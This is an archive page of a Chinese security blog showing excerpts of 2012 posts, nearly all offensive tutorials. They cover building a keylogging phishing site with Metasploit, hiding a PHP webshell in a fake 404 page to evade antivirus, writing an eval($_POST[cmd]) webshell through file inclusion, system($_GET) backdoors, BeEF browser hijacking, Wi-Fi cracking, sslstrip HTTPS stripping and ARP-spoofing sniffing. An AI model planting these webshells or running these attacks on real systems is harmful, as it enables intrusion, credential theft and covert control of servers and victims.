本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 技术文章

如何利用Metasploit制造一个键盘窃听网站

2012.09.8 , , No Comments ,

大家都应该知道网络钓鱼是什么吧,那么接下来这篇文章会来讲述如何利用Metasploit制造一个键盘窃听网站。 网络钓鱼的历史: 网络钓鱼技术始于1987年,于1995年被第一次发现。 攻击者通过钓鱼技术获取受害者的一些信息,包括用户名、密码、信用卡细节等等。 一般来说,攻击者会制造一个假冒的网站诱惑受害者进入并输入他的信息,比如仿造gmail、雅虎、facebook的...

Ubuntu下安装PHP环境

2012.09.5 , , No Comments ,

一、安装Apache2     sudo apt-get install apache2   然后在Firefox中打开: http://localhost/ 提示成功 二、安装PHP5 sudo apt-get install php5 sudo apt-get install php5-gd sudo apt-get install libapache2-mod-...

PHP 404页面的一句话 [转]

2012.09.3 , , 1 Comment ,

把一句话搞隐蔽点,搞个404页面。 然后采用核心代码@preg_replace(“/[checksql]/e”,$_POST['date'],”saft”); 这样可以有效的防止暴力破解还达到免杀的效果。 404一句话代码: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> &l...

php本地文件包含漏洞写马[转]

2012.09.3 , , No Comments ,

一句话木马 <?eval($_POST[cmd]);?> 到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语...

Ubuntu下安装BeEF[转]

2012.09.2 , , No Comments ,

BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester对这个工具都有很高的赞美。 通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,...

Wifite v2使用说明

2012.09.2 , , 1 Comment ,

wifite是一款自动化wep、wpa破解工具,不支持windows和osx。wifite的特点是可以同时攻击多个采用wep和wpa加密的网络。wifite只需简单的配置即可自动化运行,期间无需人工干预。 目前支持任何linux发行版、Backtrack 5 R1, BlackBuntu, BackBox等。 安装方法: wget https://raw.github...

sslstrip+ettercap实现https(SSL)嗅探

2012.08.25 , , No Comments ,

1. sslstrip 下载及安装方法 :wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz tar zxvf sslstrip-0.9.tar.gz cd sslstrip-0.9 sudo python ./setup.py install   2.arpspoof...

关于php后门的编写

2012.08.23 , , No Comments ,

0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写 system() --------------------------- <?php system($_GET['input']); ?> -----------...

Dsniff嗅探

2012.08.20 , , No Comments ,

arpspoof 和dsniff必须配合才可以成功截获同网关内的‘数据包’! 例 你想攻击192.168.1.222这台机器首先执行以下操做 其一,首先打开本机的路由转发功能 操作:echo "1" > /proc/sys/net/ipv4/ip_forward 第二: #arpspoof -t 网关的IP 受攻击者的IP 第三:打开另一个终端执行 #dsnif...

网络指纹识别

2012.08.19 , , No Comments ,

1、前言 在渗透测试中我们的首要任务就是收集信息,那么通过网络指纹识别那是比不缺少的一个环 节。下面我们就来介绍几种常见网络识别方法。 2.1 Netcat 如果我们要知道一台服务器是采用什么作为http 服务器,那么netcat 就是一个不错的选择。 root@bt:~# nc www.91ri.org 80 HEAD / HTTP/1.1 Host:www.91r...